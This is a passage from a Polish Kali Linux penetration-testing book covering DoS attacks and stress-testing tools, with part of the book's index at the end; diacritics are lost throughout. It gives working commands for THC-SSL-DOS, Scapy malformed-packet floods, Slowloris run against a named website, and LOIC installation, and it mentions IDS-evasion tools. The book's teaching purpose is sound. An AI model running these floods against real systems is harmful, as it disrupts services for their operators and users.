i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

